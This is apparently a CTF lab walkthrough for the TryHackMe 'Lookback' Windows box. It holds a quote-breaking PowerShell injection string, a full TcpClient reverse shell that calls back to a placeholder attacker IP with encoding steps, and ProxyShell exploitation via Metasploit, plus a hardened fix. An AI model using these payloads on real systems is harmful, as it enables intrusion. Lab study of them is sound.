Lookback Walkthrough — TryHackMe Room

SR_Shiravanthan

LookBack Room Link

Enumeration

Nmap

Let’s identify which ports are open, determine the service versions, apply default script scans on these open ports, and save the results to a text file.

nmap -Pn -n -p 80,443,3389 -sV -sC -oN nmap/enum.txt 10.10.114.82
Nmap scan report for 10.10.114.82
Host is up (0.16s latency).

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title.
|_http-server-header: Microsoft-IIS/10.0
443/tcp  open  ssl/https
| ssl-cert: Subject: commonName=WIN-12OUO7A66M7
| Subject Alternative Name: DNS:WIN-12OUO7A66M7, DNS:WIN-12OUO7A66M7.thm.local
| Not valid before: 2023-01-25T21:34:02
|_Not valid after:  2028-01-25T21:34:02
|_http-server-header: Microsoft-IIS/10.0
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=WIN-12OUO7A66M7.thm.local
| Not valid before: 2025-07-25T13:44:29
|_Not valid after:  2026-01-24T13:44:29
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul 26 09:50:46 2025 -- 1 IP address (1 host up) scanned in 54.56 seconds

Port 80 (Microsoft-IIS/10.0)

Navigating to http://10.10.114.82 shows a blank page, so let's enumerate directories with Gobuster.

Visiting https://10.10.114.82 displays a login page; the admin:admin credentials don't work there. The /test directory presents another login page.

This time admin:admin works, leading to an interface where we can execute commands. We use a PowerShell Base64-encoded reverse shell generated on revshells.com to get a shell back.

Submitting a single character such as a reveals that the input is passed into the Get-Content cmdlet as a quoted argument. We can therefore close the quote and the parenthesis, append our own command, and comment out the remainder of the original line:

' ); command #

Initial Access

Craft the reverse shell on revshells.com by filtering for Windows and selecting PowerShell #3 (Base64). Enter the listener IP and port, start a listener on that port, replace whoami in the injection payload with the generated one-liner, submit it, and wait for the connection.
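The whole chain above, as an added example rather than code from the room or the original post: a simulation of the /test input handling that shows why ' ); command # works, a locally built -EncodedCommand reverse shell in place of the revshells.com one-liner, the exact string to submit, and the hardened form of the handler. Invoke-LogViewer, Invoke-SafeLogViewer, $AttackerIp, $AttackerPort and the log directory are hypothetical placeholders.

```powershell
# Added example, not the room's own code. Invoke-LogViewer, Invoke-SafeLogViewer,
# $AttackerIp, $AttackerPort and C:\inetpub\logs are placeholders.

# --- 1. The injection point ---------------------------------------------------
function Invoke-LogViewer {
    param([string]$UserInput)
    # User input is spliced into PowerShell source and evaluated, so the probe
    # 'a' becomes Get-Content('a') and the resulting error names Get-Content.
    $code = "Get-Content('$UserInput')"
    Write-Host "[*] evaluating: $code"
    Invoke-Expression $code 2>&1 | Out-String
}

# Closing the quote and the parenthesis ends the Get-Content statement; what
# follows ';' is our own statement and '#' comments out the original ')'.
# Get-Content('') fails, but that error is statement-terminating only, so the
# next statement still runs.
Invoke-LogViewer -UserInput "'); whoami #"

# --- 2. Build the reverse shell ourselves ------------------------------------
$AttackerIp   = '10.9.0.1'   # placeholder: your VPN address
$AttackerPort = 4444         # placeholder: listen with nc -lvnp 4444

$shell = @'
$client = New-Object System.Net.Sockets.TcpClient('__IP__', __PORT__)
$stream = $client.GetStream()
$buf    = New-Object byte[] 65535
while (($n = $stream.Read($buf, 0, $buf.Length)) -ne 0) {
    $cmd = [System.Text.Encoding]::ASCII.GetString($buf, 0, $n)
    try   { $out = Invoke-Expression $cmd 2>&1 | Out-String }
    catch { $out = $_ | Out-String }
    $reply = [System.Text.Encoding]::ASCII.GetBytes($out + 'PS ' + (Get-Location).Path + '> ')
    $stream.Write($reply, 0, $reply.Length)
    $stream.Flush()
}
$client.Close()
'@ -replace '__IP__', $AttackerIp -replace '__PORT__', $AttackerPort

# -EncodedCommand takes Base64 of UTF-16LE text. A payload encoded from UTF-8
# (plain `base64` on Linux) decodes to garbage and never runs.
$encoded = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($shell))
$payload = "powershell -NoProfile -NonInteractive -EncodedCommand $encoded"

# --- 3. What goes in the form field in place of whoami -----------------------
$injected = "'); $payload #"
Write-Host "[+] submit this:`n$injected"

# --- 4. The fix: input is a file name, never code ----------------------------
function Invoke-SafeLogViewer {
    param([string]$FileName)
    $base = 'C:\inetpub\logs'   # assumed log directory
    if ($FileName -notmatch '^[A-Za-z0-9_.-]+$') { throw "invalid file name: $FileName" }
    Get-Content -LiteralPath (Join-Path $base $FileName)   # passed as data, not evaluated
}
```

The vulnerable handler builds source text from untrusted input and hands it to Invoke-Expression, which is the whole bug; the safe version never constructs code, restricts the input to a bare file name and resolves it under a fixed directory with -LiteralPath, so neither quotes nor path traversal reach anything that interprets them.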

Privilege Escalation

In the dev user's Desktop folder there is an interesting file named TODO.txt. From it we gather usernames such as joe and carol, their email addresses, and the developer's notes.

Microsoft Exchange Server is installed on this machine, so let's identify exactly which version is running.

Once we have the version, we can look up online which Cumulative Update (CU) and Security Update (SU) level it corresponds to.

In this case it's Exchange Server 2019 CU9. A CU9 install without the April and May 2021 Security Updates is vulnerable to ProxyShell (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207), a pre-authentication RCE chain, which Metasploit's exploit/windows/http/exchange_proxyshell_rce module exploits over port 443. The module needs a valid mailbox address in the organisation (its EMAIL option), which is one use for the addresses collected from TODO.txt.

Running the exploit successfully gives us a shell as NT AUTHORITY\SYSTEM.

Tools/Reference for this room

  1. Gobuster

  2. Metasploit

  3. nmap

  4. https://www.rapid7.com/db/modules/exploit/windows/http/exchange_proxyshell_rce/
